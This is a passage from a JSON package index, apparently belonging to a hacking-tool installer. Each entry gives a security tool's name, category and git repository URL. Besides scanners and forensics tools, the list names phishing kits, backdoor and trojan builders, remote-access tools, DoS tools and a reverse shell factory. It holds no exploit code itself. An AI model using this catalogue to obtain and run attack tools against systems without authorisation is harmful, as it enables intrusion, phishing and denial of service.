["wireless_testing"], 2118 | "url" : "https://github.com/chrizator/netattack2.git", 2119 | "package_manager" : "git", 2120 | "dependency" : ["python","git"] 2121 | }, 2122 | "netattack" : { 2123 | "name" : "netattack", 2124 | "package_name" : "netattack", 2125 | "category" : ["wireless_testing"], 2126 | "url" : "https://github.com/chrizator/netattack.git", 2127 | "package_manager" : "git", 2128 | "dependency" : ["python","git"] 2129 | }, 2130 | "netdiscover" : { 2131 | "name" : "netdiscover", 2132 | "package_name" : "netdiscover", 2133 | "category" : [null], 2134 | "url" : "https://github.com/alexxy/netdiscover.git", 2135 | "package_manager" : "git", 2136 | "dependency" : ["git"] 2137 | }, 2138 | "nginx" : { 2139 | "name" : "nginx", 2140 | "package_name" : "nginx", 2141 | "category" : ["web_server","package"], 2142 | "url" : null, 2143 | "package_manager" : "package_manager", 2144 | "dependency" : [null] 2145 | }, 2146 | "nikto" : { 2147 | "name" : "nikto", 2148 | "package_name" : "nikto", 2149 | "category" : ["information_gathering"], 2150 | "url" : "https://github.com/sullo/nikto.git", 2151 | "package_manager" : "git", 2152 | "dependency" : ["perl","git"] 2153 | }, 2154 | "nishang" : { 2155 | "name" : "nishang", 2156 | "package_name" : "nishang", 2157 | "category" : ["maintaining_access"], 2158 | "url" : "https://github.com/samratashok/nishang.git", 2159 | "package_manager" : "git", 2160 | "dependency" : ["git"] 2161 | }, 2162 | "nmap" : { 2163 | "name" : "nmap", 2164 | "package_name" : "nmap", 2165 | "category" : ["information_gathering","vulnerability_scanner"], 2166 | "url" : null, 2167 | "package_manager" : "package_manager", 2168 | "dependency" : [null] 2169 | }, 2170 | "nodejs" : { 2171 | "name" : "nodejs", 2172 | "package_name" : "nodejs", 2173 | "category" : ["programming_language"], 2174 | "url" : null, 2175 | "package_manager" : "package_manager", 2176 | "dependency" : [null] 2177 | }, 2178 | "nodexp" : { 2179 | "name" : "nodexp", 2180 | "package_name" : "nodexp", 2181 | "category" : [null], 2182 | "url" : "https://github.com/esmog/nodexp.git", 2183 | "package_manager" : "git", 2184 | "dependency" : ["python","git"] 2185 | }, 2186 | "noisy" : { 2187 | "name" : "noisy", 2188 | "package_name" : "noisy", 2189 | "category" : [null], 2190 | "url" : "https://github.com/1tayH/noisy.git", 2191 | "package_manager" : "git", 2192 | "dependency" : ["python","git"] 2193 | }, 2194 | "onioff" : { 2195 | "name" : "onioff", 2196 | "package_name" : "onioff", 2197 | "category" : [null], 2198 | "url" : "https://github.com/k4m4/onioff.git", 2199 | "package_manager" : "git", 2200 | "dependency" : ["python","git"] 2201 | }, 2202 | "openvas" : { 2203 | "name" : "openvas", 2204 | "package_name" : "openvas", 2205 | "category" : ["vulnerability_scanner"], 2206 | "url" : "https://github.com/greenbone/openvas.git", 2207 | "package_manager" : "git", 2208 | "dependency" : ["clang","gcc","git"] 2209 | }, 2210 | "osrframework" : { 2211 | "name" : "osrframework", 2212 | "package_name" : "osrframework", 2213 | "category" : ["information_gathering"], 2214 | "url" : "https://github.com/i3visio/osrframework.git", 2215 | "package_manager" : "git", 2216 | "dependency" : ["python","git"] 2217 | }, 2218 | "p0f" : { 2219 | "name" : "p0f", 2220 | "package_name" : "p0f", 2221 | "category" : ["forensics_tools"], 2222 | "url" : "https://gitlab.com/kalilinux/packages/p0f.git", 2223 | "package_manager" : "git", 2224 | "dependency" : ["clang","gcc","g++","git"] 2225 | }, 2226 | "patator" : { 2227 | "name" : "patator", 2228 | "package_name" : "patator", 2229 | "category" : ["password_attack"], 2230 | "url" : "https://gitlab.com/kalilinux/packages/patator.git", 2231 | "package_manager" : "git", 2232 | "dependency" : ["python","git"] 2233 | }, 2234 | "pdf-parser" : { 2235 | "name" : "pdf-parser", 2236 | "package_name" : "pdf-parser", 2237 | "category" : ["forensics_tools"], 2238 | "url" : "https://gitlab.com/kalilinux/packages/pdf-parser.git", 2239 | "package_manager" : "git", 2240 | "dependency" : ["python","git"] 2241 | }, 2242 | "peepdf" : { 2243 | "name" : "peepdf", 2244 | "package_name" : "peepdf", 2245 | "category" : [null], 2246 | "url" : "https://github.com/jesparza/peepdf.git", 2247 | "package_manager" : "git", 2248 | "dependency" : ["python","git"] 2249 | }, 2250 | "perl" : { 2251 | "name" : "perl", 2252 | "package_name" : "perl", 2253 | "category" : ["programming_language"], 2254 | "url" : null, 2255 | "package_manager" : "package_manager", 2256 | "dependency" : [null] 2257 | }, 2258 | "php" : { 2259 | "name" : "php", 2260 | "package_name" : "php", 2261 | "category" : ["programming_language"], 2262 | "url" : null, 2263 | "package_manager" : "package_manager", 2264 | "dependency" : [null] 2265 | }, 2266 | "pixiewps" : { 2267 | "name" : "pixiewps", 2268 | "package_name" : "pixiewps", 2269 | "category" : ["wireless_testing"], 2270 | "url" : "https://github.com/wiire-a/pixiewps.git", 2271 | "package_manager" : "git", 2272 | "dependency" : ["clang","gcc","git"] 2273 | }, 2274 | "plecost" : { 2275 | "name" : "plecost", 2276 | "package_name" : "plecost", 2277 | "category" : ["web_hacking"], 2278 | "url" : "https://github.com/iniqua/plecost.git", 2279 | "package_manager" : "git", 2280 | "dependency" : ["python","git"] 2281 | }, 2282 | "powerfuzzer" : { 2283 | "name" : "powerfuzzer", 2284 | "package_name" : "powerfuzzer", 2285 | "category" : ["vulnerability_scanner"], 2286 | "url" : "https://gitlab.com/marcinguy/powerfuzzer.git", 2287 | "package_manager" : "git", 2288 | "dependency" : ["python","git"] 2289 | }, 2290 | "proxystrike" : { 2291 | "name" : "proxystrike", 2292 | "package_name" : "proxystrike", 2293 | "category" : ["web_hacking"], 2294 | "url" : "https://github.com/qunxyz/proxystrike.git", 2295 | "package_manager" : "git", 2296 | "dependency" : ["python","git"] 2297 | }, 2298 | "pupy" : { 2299 | "name" : "pupy", 2300 | "package_name" : "pupy", 2301 | "category" : [null], 2302 | "url" : "https://github.com/n1nj4sec/pupy", 2303 | "package_manager" : "git", 2304 | "dependency" : ["python","git"] 2305 | }, 2306 | "pwnat" : { 2307 | "name" : "pwnat", 2308 | "package_name" : "pwnat", 2309 | "category" : ["maintaining_access"], 2310 | "url" : "https://github.com/samyk/pwnat.git", 2311 | "package_manager" : "git", 2312 | "dependency" : ["clang","gcc","git"] 2313 | }, 2314 | "pyPISHER" : { 2315 | "name" : "pyPISHER", 2316 | "package_name" : "pyPISHER", 2317 | "category" : ["sniffing_spoofing"], 2318 | "url" : "https://github.com/Renato-Silva/pyPISHER.git", 2319 | "package_manager" : "git", 2320 | "dependency" : ["python","git"] 2321 | }, 2322 | "PyPhisher" : { 2323 | "name" : "PyPhisher", 2324 | "package_name" : "PyPhisher", 2325 | "category" : ["sniffing_spoofing", "information_gathering"], 2326 | "url" : "https://github.com/KasRoudra/PyPhisher.git", 2327 | "package_manager" : "git", 2328 | "dependency" : ["python","git","php","curl","wget","unzip"] 2329 | }, 2330 | "pybluez" : { 2331 | "name" : "pybluez", 2332 | "package_name" : "pybluez", 2333 | "category" : [null], 2334 | "url" : "https://github.com/karulis/pybluez.git", 2335 | "package_manager" : "git", 2336 | "dependency" : ["python","git"] 2337 | }, 2338 | "pydictor" : { 2339 | "name" : "pydictor", 2340 | "package_name" : "pydictor", 2341 | "category" : [null], 2342 | "url" : "https://github.com/LandGrey/pydictor.git", 2343 | "package_manager" : "git", 2344 | "dependency" : ["python","git"] 2345 | }, 2346 | "python" : { 2347 | "name" : "python", 2348 | "package_name" : "python", 2349 | "category" : ["programming_language"], 2350 | "url" : null, 2351 | "package_manager" : "package_manager", 2352 | "dependency" : [null] 2353 | }, 2354 | "qark" : { 2355 | "name" : "qark", 2356 | "package_name" : "qark", 2357 | "category" : [null], 2358 | "url" : "https://github.com/linkedin/qark.git", 2359 | "package_manager" : "git", 2360 | "dependency" : ["python","git"] 2361 | }, 2362 | "rang3r" : { 2363 | "name" : "rang3r", 2364 | "package_name" : "rang3r", 2365 | "category" : ["vulnerability_scanner"], 2366 | "url" : "https://github.com/floriankunushevci/rang3r.git", 2367 | "package_manager" : "git", 2368 | "dependency" : ["python","git"] 2369 | }, 2370 | "rdpy" : { 2371 | "name" : "rdpy", 2372 | "package_name" : "rdpy", 2373 | "category" : [null], 2374 | "url" : "https://github.com/citronneur/rdpy.git", 2375 | "package_manager" : "git", 2376 | "dependency" : ["python","git"] 2377 | }, 2378 | "reaver" : { 2379 | "name" : "reaver", 2380 | "package_name" : "reaver-wps-fork-t6x", 2381 | "category" : ["wireless_testing"], 2382 | "url" : "https://github.com/t6x/reaver-wps-fork-t6x.git", 2383 | "package_manager" : "git", 2384 | "dependency" : ["clang","gcc","git"] 2385 | }, 2386 | "recon-ng" : { 2387 | "name" : "recon-ng", 2388 | "package_name" : "recon-ng", 2389 | "category" : ["information_gathering"], 2390 | "url" : "https://github.com/lanmaster53/recon-ng.git", 2391 | "package_manager" : "git", 2392 | "dependency" : ["python","git"] 2393 | }, 2394 | "ridenum" : { 2395 | "name" : "ridenum", 2396 | "package_name" : "ridenum", 2397 | "category" : ["maintaining_access"], 2398 | "url" : "https://github.com/trustedsec/ridenum.git", 2399 | "package_manager" : "git", 2400 | "dependency" : ["python","git"] 2401 | }, 2402 | "routersploit" : { 2403 | "name" : "routersploit", 2404 | "package_name" : "routersploit", 2405 | "category" : ["vulnerability_scanner","exploitation_tools"], 2406 | "url" : "https://github.com/reverse-shell/routersploit.git", 2407 | "package_manager" : "git", 2408 | "dependency" : ["python","git"] 2409 | }, 2410 | "roxysploit" : { 2411 | "name" : "roxysploit", 2412 | "package_name" : "roxysploit", 2413 | "category" : ["exploitation_tools"], 2414 | "url" : "https://github.com/andyvaikunth/roxysploit.git", 2415 | "package_manager" : "git", 2416 | "dependency" : ["python","git"] 2417 | }, 2418 | "ruby" : { 2419 | "name" : "ruby", 2420 | "package_name" : "ruby", 2421 | "category" : ["programming_language"], 2422 | "url" : null, 2423 | "package_manager" : "package_manager", 2424 | "dependency" : [null] 2425 | }, 2426 | "sAINT" : { 2427 | "name" : "sAINT", 2428 | "package_name" : "sAINT", 2429 | "category" : [null], 2430 | "url" : "https://github.com/tiagorlampert/sAINT.git", 2431 | "package_manager" : "git", 2432 | "dependency" : ["git"] 2433 | }, 2434 | "santet-online" : { 2435 | "name" : "santet-online", 2436 | "package_name" : "santet-online", 2437 | "category" : ["stress_testing","sniffing_spoofing"], 2438 | "url" : "https://github.com/Gameye98/santet-online.git", 2439 | "package_manager" : "git", 2440 | "dependency" : ["python","git"] 2441 | }, 2442 | "secHub" : { 2443 | "name" : "secHub", 2444 | "package_name" : "secHub", 2445 | "category" : [null], 2446 | "url" : "https://github.com/cys3c/secHub.git", 2447 | "package_manager" : "git", 2448 | "dependency" : ["python","git"] 2449 | }, 2450 | "shellnoob" : { 2451 | "name" : "shellnoob", 2452 | "package_name" : "shellnoob", 2453 | "category" : ["exploitation_tools"], 2454 | "url" : "https://github.com/reyammer/shellnoob.git", 2455 | "package_manager" : "git", 2456 | "dependency" : ["python","git"] 2457 | }, 2458 | "shellstack" : { 2459 | "name" : "shellstack", 2460 | "package_name" : "shellstack", 2461 | "category" : [null], 2462 | "url" : "https://github.com/Tuhinshubhra/shellstack.git", 2463 | "package_manager" : "git", 2464 | "dependency" : ["php","git"] 2465 | }, 2466 | "shimit" : { 2467 | "name" : "shimit", 2468 | "package_name" : "shimit", 2469 | "category" : [null], 2470 | "url" : "https://github.com/cyberark/shimit.git", 2471 | "package_manager" : "git", 2472 | "dependency" : ["python","git"] 2473 | }, 2474 | "shodanwave" : { 2475 | "name" : "shodanwave", 2476 | "package_name" : "shodanwave", 2477 | "category" : [null], 2478 | "url" : "https://github.com/6IX7ine/shodanwave.git", 2479 | "package_manager" : "git", 2480 | "dependency" : ["python","git"] 2481 | }, 2482 | "sipvicious" : { 2483 | "name" : "sipvicious", 2484 | "package_name" : "sipvicious", 2485 | "category" : ["sniffing_spoofing"], 2486 | "url" : "https://github.com/EnableSecurity/sipvicious.git", 2487 | "package_manager" : "git", 2488 | "dependency" : ["python","git"] 2489 | }, 2490 | "skipfish" : { 2491 | "name" : "skipfish", 2492 | "package_name" : "skipfish", 2493 | "category" : ["web_hacking"], 2494 | "url" : "https://gitlab.com/kalilinux/packages/skipfish.git", 2495 | "package_manager" : "git", 2496 | "dependency" : ["clang","gcc","git"] 2497 | }, 2498 | "slowhttptest" : { 2499 | "name" : "slowhttptest", 2500 | "package_name" : "slowhttptest", 2501 | "category" : ["stress_testing"], 2502 | "url" : "https://github.com/shekyan/slowhttptest.git", 2503 | "package_manager" : "git", 2504 | "dependency" : ["clang","gcc","g++","git"] 2505 | }, 2506 | "slowloris" : { 2507 | "name" : "slowloris", 2508 | "package_name" : "slowloris", 2509 | "category" : ["ddos","stress_testing"], 2510 | "url" : "https://github.com/gkbrk/slowloris.git", 2511 | "package_manager" : "git", 2512 | "dependency" : ["python","git"] 2513 | }, 2514 | "smap" : { 2515 | "name" : "smap", 2516 | "package_name" : "smap", 2517 | "category" : ["web_hacking"], 2518 | "url" : "https://github.com/s0cket7/smap", 2519 | "package_manager" : "git", 2520 | "dependency" : ["python","git"] 2521 | }, 2522 | "smbmap" : { 2523 | "name" : "smbmap", 2524 | "package_name" : "smbmap", 2525 | "category" : ["information_gathering"], 2526 | "url" : "https://github.com/ShawnDEvans/smbmap.git", 2527 | "package_manager" : "git", 2528 | "dependency" : ["python","git"] 2529 | }, 2530 | "sniffjoke" : { 2531 | "name" : "sniffjoke", 2532 | "package_name" : "sniffjoke", 2533 | "category" : ["sniffing_spoofing"], 2534 | "url" : "https://github.com/vecna/sniffjoke.git", 2535 | "package_manager" : "git", 2536 | "dependency" : ["clang","gcc","g++","git"] 2537 | }, 2538 | "social-engineer-toolkit" : { 2539 | "name" : "social-engineer-toolkit", 2540 | "package_name" : "social-engineer-toolkit", 2541 | "category" : ["information_gathering","exploitation_tools","password_attack","sniffing_spoofing"], 2542 | "url" : "https://github.com/trustedsec/social-engineer-toolkit.git", 2543 | "package_manager" : "git", 2544 | "dependency" : ["python","git"] 2545 | }, 2546 | "sqliv" : { 2547 | "name" : "sqliv", 2548 | "package_name" : "sqliv", 2549 | "category" : ["vulnerability_scanner","web_hacking"], 2550 | "url" : "https://github.com/Hadesy2k/sqliv.git", 2551 | "package_manager" : "git", 2552 | "dependency" : ["python","git"] 2553 | }, 2554 | "sqlmap" : { 2555 | "name" : "sqlmap", 2556 | "package_name" : "sqlmap", 2557 | "category" : ["information_gathering","vulnerability_scanner","exploitation_tools","web_hacking"], 2558 | "url" : "https://github.com/sqlmapproject/sqlmap", 2559 | "package_manager" : "git", 2560 | "dependency" : ["python","git"] 2561 | }, 2562 | "sqlmate" : { 2563 | "name" : "sqlmate", 2564 | "package_name" : "sqlmate", 2565 | "category" : ["information_gathering","vulnerability_scanner","web_hacking"], 2566 | "url" : "https://github.com/s0md3v/sqlmate.git", 2567 | "package_manager" : "git", 2568 | "dependency" : ["python","git"] 2569 | }, 2570 | "sqlscan" : { 2571 | "name" : "sqlscan", 2572 | "package_name" : "sqlscan", 2573 | "category" : ["information_gathering","vulnerability_scanner","web_hacking"], 2574 | "url" : "https://github.com/Cvar1984/sqlscan.git", 2575 | "package_manager" : "git", 2576 | "dependency" : ["php","git"] 2577 | }, 2578 | "sslcaudit" : { 2579 | "name" : "sslcaudit", 2580 | "package_name" : "sslcaudit", 2581 | "category" : ["information_gathering"], 2582 | "url" : "https://github.com/abbbe/sslcaudit.git", 2583 | "package_manager" : "git", 2584 | "dependency" : ["clang","gcc","git"] 2585 | }, 2586 | "sslsplit" : { 2587 | "name" : "sslsplit", 2588 | "package_name" : "sslsplit", 2589 | "category" : ["information_gathering"], 2590 | "url" : "https://github.com/droe/sslsplit.git", 2591 | "package_manager" : "git", 2592 | "dependency" : ["clang","gcc","git"] 2593 | }, 2594 | "sslstrip" : { 2595 | "name" : "sslstrip", 2596 | "package_name" : "sslstrip", 2597 | "category" : ["information_gathering","sniffing_spoofing"], 2598 | "url" : "https://github.com/moxie0/sslstrip.git", 2599 | "package_manager" : "git", 2600 | "dependency" : ["python","git"] 2601 | }, 2602 | "sslyze" : { 2603 | "name" : "sslyze", 2604 | "package_name" : "sslyze", 2605 | "category" : ["information_gathering"], 2606 | "url" : "https://github.com/iSECPartners/sslyze.git", 2607 | "package_manager" : "git", 2608 | "dependency" : ["python","git"] 2609 | }, 2610 | "subscraper" : { 2611 | "name" : "subscraper", 2612 | "package_name" : "subscraper", 2613 | "category" : [null], 2614 | "url" : "https://github.com/m8r0wn/subscraper.git", 2615 | "package_manager" : "git", 2616 | "dependency" : ["python","git"] 2617 | }, 2618 | "termineter" : { 2619 | "name" : "termineter", 2620 | "package_name" : "termineter", 2621 | "category" : ["stress_testing"], 2622 | "url" : "https://github.com/securestate/termineter.git", 2623 | "package_manager" : "git", 2624 | "dependency" : ["python","git"] 2625 | }, 2626 | "termux-fedora" : { 2627 | "name" : "termux-fedora", 2628 | "package_name" : "termux-fedora", 2629 | "category" : ["termux_os"], 2630 | "url" : "https://github.com/nmilosev/termux-fedora.git", 2631 | "package_manager" : "git", 2632 | "dependency" : ["git","proot"] 2633 | }, 2634 | "termux-lazysqlmap" : { 2635 | "name" : "termux-lazysqlmap", 2636 | "package_name" : "termux-lazysqlmap", 2637 | "category" : [null], 2638 | "url" : "https://github.com/verluchie/termux-lazysqlmap.git", 2639 | "package_manager" : "git", 2640 | "dependency" : ["git"] 2641 | }, 2642 | "termux-ubuntu" : { 2643 | "name" : "termux-ubuntu", 2644 | "package_name" : "termux-ubuntu", 2645 | "category" : ["termux_os"], 2646 | "url" : "https://github.com/Neo-Oli/termux-ubuntu.git", 2647 | "package_manager" : "git", 2648 | "dependency" : ["git","proot"] 2649 | }, 2650 | "thc-ipv6" : { 2651 | "name" : "thc-ipv6", 2652 | "package_name" : "thc-ipv6", 2653 | "category" : ["information_gathering","vulnerability_scanner","exploitation_tools"], 2654 | "url" : "https://github.com/vanhauser-thc/thc-ipv6.git", 2655 | "package_manager" : "git", 2656 | "dependency" : ["clang","gcc","git"] 2657 | }, 2658 | "the-backdoor-factory" : { 2659 | "name" : "the-backdoor-factory", 2660 | "package_name" : "the-backdoor-factory", 2661 | "category" : ["exploitation_tools"], 2662 | "url" : "https://github.com/secretsquirrel/the-backdoor-factory.git", 2663 | "package_manager" : "git", 2664 | "dependency" : ["python","git"] 2665 | }, 2666 | "theHarvester" : { 2667 | "name" : "theHarvester", 2668 | "package_name" : "theHarvester", 2669 | "category" : ["information_gathering"], 2670 | "url" : "https://github.com/laramies/theHarvester.git", 2671 | "package_manager" : "git", 2672 | "dependency" : ["python","git"] 2673 | }, 2674 | "toilet" : { 2675 | "name" : "toilet", 2676 | "package_name" : "toilet", 2677 | "category" : ["package"], 2678 | "url" : null, 2679 | "package_manager" : "package_manager", 2680 | "dependency" : [null] 2681 | }, 2682 | "torghost" : { 2683 | "name" : "torghost", 2684 | "package_name" : "torghost", 2685 | "category" : [null], 2686 | "url" : "https://github.com/susmithHCK/torghost.git", 2687 | "package_manager" : "git", 2688 | "dependency" : ["python","git"] 2689 | }, 2690 | "torshammer" : { 2691 | "name" : "torshammer", 2692 | "package_name" : "torshammer", 2693 | "category" : ["stress_testing"], 2694 | "url" : "https://github.com/dotfighter/torshammer.git", 2695 | "package_manager" : "git", 2696 | "dependency" : ["python","git"] 2697 | }, 2698 | "tor" : { 2699 | "name" : "tor", 2700 | "package_name" : "tor", 2701 | "category" : ["package"], 2702 | "url" : null, 2703 | "package_manager" : "package_manager", 2704 | "dependency" : [null] 2705 | }, 2706 | "trackout" : { 2707 | "name" : "trackout", 2708 | "package_name" : "trackout", 2709 | "category" : ["information_gathering","ip_tracking"], 2710 | "url" : "https://github.com/abaykan/trackout.git", 2711 | "package_manager" : "git", 2712 | "dependency" : ["python","git"] 2713 | }, 2714 | "trape" : { 2715 | "name" : "trape", 2716 | "package_name" : "trape", 2717 | "category" : ["ip_tracking"], 2718 | "url" : "https://github.com/boxug/trape.git", 2719 | "package_manager" : "git", 2720 | "dependency" : ["python","git"] 2721 | }, 2722 | "trojanizer" : { 2723 | "name" : "trojanizer", 2724 | "package_name" : "trojanizer", 2725 | "category" : [null], 2726 | "url" : "https://github.com/r00t-3xp10it/trojanizer.git", 2727 | "package_manager" : "git", 2728 | "dependency" : ["git"] 2729 | }, 2730 | "txtool" : { 2731 | "name" : "txtool", 2732 | "package_name" : "txtool", 2733 | "category" : ["exploitation_tools"], 2734 | "url" : "https://github.com/kuburan/txtool.git", 2735 | "package_manager" : "git", 2736 | "dependency" : ["python","git"] 2737 | }, 2738 | "uidsploit" : { 2739 | "name" : "uidsploit", 2740 | "package_name" : "uidsploit", 2741 | "category" : [null], 2742 | "url" : "https://github.com/siruidops/uidsploit.git", 2743 | "package_manager" : "git", 2744 | "dependency" : ["git"] 2745 | }, 2746 | "volatility" : { 2747 | "name" : "volatility", 2748 | "package_name" : "volatility", 2749 | "category" : ["forensics_tools"], 2750 | "url" : "https://github.com/volatilityfoundation/volatility.git", 2751 | "package_manager" : "git", 2752 | "dependency" : ["python","git"] 2753 | }, 2754 | "w3af" : { 2755 | "name" : "w3af", 2756 | "package_name" : "w3af", 2757 | "category" : ["web_hacking"], 2758 | "url" : "https://github.com/andresriancho/w3af.git", 2759 | "package_manager" : "git", 2760 | "dependency" : ["python","git"] 2761 | }, 2762 | "w3m" : { 2763 | "name" : "w3m", 2764 | "package_name" : "w3m", 2765 | "category" : ["package"], 2766 | "url" : null, 2767 | "package_manager" : "package_manager", 2768 | "dependency" : [null] 2769 | }, 2770 | "wafw00f" : { 2771 | "name" : "wafw00f", 2772 | "package_name" : "wafw00f", 2773 | "category" : [null], 2774 | "url" : "https://github.com/EnableSecurity/wafw00f.git", 2775 | "package_manager" : "git", 2776 | "dependency" : ["python","git"] 2777 | }, 2778 | "webdav" : { 2779 | "name" : "webdav", 2780 | "package_name" : "webdav", 2781 | "category" : ["web_hacking"], 2782 | "url" : "https://github.com/hacdias/webdav.git", 2783 | "package_manager" : "git", 2784 | "dependency" : ["golang","git"] 2785 | }, 2786 | "webpwn3r" : { 2787 | "name" : "webpwn3r", 2788 | "package_name" : "webpwn3r", 2789 | "category" : [null], 2790 | "url" : "https://github.com/zigoo0/webpwn3r.git", 2791 | "package_manager" : "git", 2792 | "dependency" : ["python","git"] 2793 | }, 2794 | "websploit" : { 2795 | "name" : "websploit", 2796 | "package_name" : "websploit", 2797 | "category" : ["web_hacking","exploitation_tools"], 2798 | "url" : "https://github.com/websploit/websploit.git", 2799 | "package_manager" : "git", 2800 | "dependency" : ["python","git"] 2801 | }, 2802 | "weeman" : { 2803 | "name" : "weeman", 2804 | "package_name" : "weeman", 2805 | "category" : [null], 2806 | "url" : "https://github.com/evait-security/weeman.git", 2807 | "package_manager" : "git", 2808 | "dependency" : ["python","git"] 2809 | }, 2810 | "weevely3" : { 2811 | "name" : "weevely3", 2812 | "package_name" : "weevely3", 2813 | "category" : [null], 2814 | "url" : "https://github.com/epinna/weevely3.git", 2815 | "package_manager" : "git", 2816 | "dependency" : ["python","git"] 2817 | }, 2818 | "wfdroid-termux" : { 2819 | "name" : "wfdroid-termux", 2820 | "package_name" : "wfdroid-termux", 2821 | "category" : [null], 2822 | "url" : "https://github.com/bytezcrew/wfdroid-termux.git", 2823 | "package_manager" : "git", 2824 | "dependency" : ["git"] 2825 | }, 2826 | "wfuzz" : { 2827 | "name" : "wfuzz", 2828 | "package_name" : "wfuzz", 2829 | "category" : ["web_hacking"], 2830 | "url" : "https://github.com/xmendez/wfuzz.git", 2831 | "package_manager" : "git", 2832 | "dependency" : ["python","git"] 2833 | }, 2834 | "wget" : { 2835 | "name" : "wget", 2836 | "package_name" : "wget", 2837 | "category" : ["package"], 2838 | "url" : null, 2839 | "package_manager" : "package_manager", 2840 | "dependency" : [null] 2841 | }, 2842 | "wifi-hacker" : { 2843 | "name" : "wifi-hacker", 2844 | "package_name" : "wifi-hacker", 2845 | "category" : ["wireless_testing"], 2846 | "url" : "https://github.com/esc0rtd3w/wifi-hacker.git", 2847 | "package_manager" : "git", 2848 | "dependency" : ["git"] 2849 | }, 2850 | "WifiGod" : { 2851 | "name" : "WifiGod", 2852 | "package_name" : "WifiGod", 2853 | "category" : ["wireless_testing"], 2854 | "url" : "https://github.com/waseem-sajjad/WifiGod.git", 2855 | "package_manager" : "git", 2856 | "dependency" : ["python","git"] 2857 | }, 2858 | "wifiphisher" : { 2859 | "name" : "wifiphisher", 2860 | "package_name" : "wifiphisher", 2861 | "category" : ["wireless_testing"], 2862 | "url" : "https://github.com/wifiphisher/wifiphisher.git", 2863 | "package_manager" : "git", 2864 | "dependency" : ["python","git"] 2865 | }, 2866 | "wifitap" : { 2867 | "name" : "wifitap", 2868 | "package_name" : "wifitap", 2869 | "category" : ["wireless_testing"], 2870 | "url" : "https://github.com/GDSSecurity/wifitap.git", 2871 | "package_manager" : "git", 2872 | "dependency" : ["python","git"] 2873 | }, 2874 | "wifite2" : { 2875 | "name" : "wifite2", 2876 | "package_name" : "wifite2", 2877 | "category" : ["wireless_testing"], 2878 | "url" : "https://github.com/derv82/wifite2.git", 2879 | "package_manager" : "git", 2880 | "dependency" : ["python","git"] 2881 | }, 2882 | "wifite" : { 2883 | "name" : "wifite", 2884 | "package_name" : "wifite", 2885 | "category" : ["wireless_testing"], 2886 | "url" : "https://github.com/derv82/wifite.git", 2887 | "package_manager" : "git", 2888 | "dependency" : ["python","git"] 2889 | }, 2890 | "wifresti" : { 2891 | "name" : "wifresti", 2892 | "package_name" : "wifresti", 2893 | "category" : ["wireless_testing"], 2894 | "url" : "https://github.com/LionSec/wifresti.git", 2895 | "package_manager" : "git", 2896 | "dependency" : ["python","git"] 2897 | }, 2898 | "wirespy" : { 2899 | "name" : "wirespy", 2900 | "package_name" : "wirespy", 2901 | "category" : ["wireless_testing"], 2902 | "url" : "https://github.com/AresS31/wirespy.git", 2903 | "package_manager" : "git", 2904 | "dependency" : ["git"] 2905 | }, 2906 | "wpscan" : { 2907 | "name" : "wpscan", 2908 | "package_name" : "wpscan", 2909 | "category" : ["information_gathering","vulnerability_scanner","web_hacking"], 2910 | "url" : "https://github.com/wpscanteam/wpscan.git", 2911 | "package_manager" : "git", 2912 | "dependency" : ["ruby","git"] 2913 | }, 2914 | "wreckuests" : { 2915 | "name" : "wreckuests", 2916 | "package_name" : "wreckuests", 2917 | "category" : [null], 2918 | "url" : "https://github.com/JamesJGoodwin/wreckuests.git", 2919 | "package_manager" : "git", 2920 | "dependency" : ["python","git"] 2921 | }, 2922 | "xerosploit" : { 2923 | "name" : "xerosploit", 2924 | "package_name" : "xerosploit", 2925 | "category" : ["exploitation_tools"], 2926 | "url" : "https://github.com/LionSec/xerosploit.git", 2927 | "package_manager" : "git", 2928 | "dependency" : ["python","git"] 2929 | }, 2930 | "xplico" : { 2931 | "name" : "xplico", 2932 | "package_name" : "xplico", 2933 | "category" : ["forensics_tools"], 2934 | "url" : "https://gitlab.com/kalilinux/packages/xplico.git", 2935 | "package_manager" : "git", 2936 | "dependency" : ["clang","gcc","php","git"] 2937 | }, 2938 | "xspy" : { 2939 | "name" : "xspy", 2940 | "package_name" : "xspy", 2941 | "category" : ["sniffing_spoofing"], 2942 | "url" : "https://github.com/mnp/xspy.git", 2943 | "package_manager" : "git", 2944 | "dependency" : ["clang","gcc","git"] 2945 | }, 2946 | "xsser" : { 2947 | "name" : "xsser", 2948 | "package_name" : "xsser", 2949 | "category" : ["web_hacking"], 2950 | "url" : "https://github.com/epsylon/xsser.git", 2951 | "package_manager" : "git", 2952 | "dependency" : ["python","git"] 2953 | }, 2954 | "yersinia" : { 2955 | "name" : "yersinia", 2956 | "package_name" : "yersinia", 2957 | "category" : ["vulnerability_scanner","exploitation_tools"], 2958 | "url" : "https://github.com/tomac/yersinia.git", 2959 | "package_manager" : "git", 2960 | "dependency" : ["clang","gcc","git"] 2961 | }, 2962 | "zambie" : { 2963 | "name" : "zambie", 2964 | "package_name" : "zambie", 2965 | "category" : [null], 2966 | "url" : "https://github.com/zanyarjamal/zambie.git", 2967 | "package_manager" : "git", 2968 | "dependency" : ["python","git"] 2969 | }, 2970 | "zaproxy" : { 2971 | "name" : "zaproxy", 2972 | "package_name" : "zaproxy", 2973 | "category" : ["web_hacking"], 2974 | "url" : "https://github.com/zaproxy/zaproxy.git", 2975 | "package_manager" : "git", 2976 | "dependency" : ["python","php","git"] 2977 | }, 2978 | "zarp" : { 2979 | "name" : "zarp", 2980 | "package_name" : "zarp", 2981 | "category" : [null], 2982 | "url" : "https://github.com/hatRiot/zarp.git", 2983 | "package_manager" : "git", 2984 | "dependency" : ["python","git"] 2985 | }, 2986 | "zip" : { 2987 | "name" : "zip", 2988 | "package_name" : "zip", 2989 | "category" : ["package"], 2990 | "url" : null, 2991 | "package_manager" : "package_manager", 2992 | "dependency" : [null] 2993 | }, 2994 | "zirikatu" : { 2995 | "name" : "zirikatu", 2996 | "package_name" : "zirikatu", 2997 | "category" : [null], 2998 | "url" : "https://github.com/pasahitz/zirikatu.git", 2999 | "package_manager" : "git", 3000 | "dependency" : ["git"] 3001 | }, 3002 | "a-xex" : { 3003 | "name" : "a-xex", 3004 | "package_name" : "a-xex", 3005 | "category" : ["web_hacking","exploitation_tools","information_gathering","vulnerability_scanner"], 3006 | "url" : "https://github.com/farinap5/A-xex.git", 3007 | "package_manager" : "git", 3008 | "dependency" : ["python","git"] 3009 | }, 3010 | "rsfac" : { 3011 | "name" : "Reverse Shell Factory", 3012 | "package_name" : "rsfac", 3013 | "category" : ["web_hacking","exploitation_tools"], 3014 | "url" : "https://github.com/farinap5/rsfac.git", 3015 | "package_manager" : "git", 3016 | "dependency" : ["python","git"] 3017 | } 3018 | } 3019 | -------------------------------------------------------------------------------- /Tool 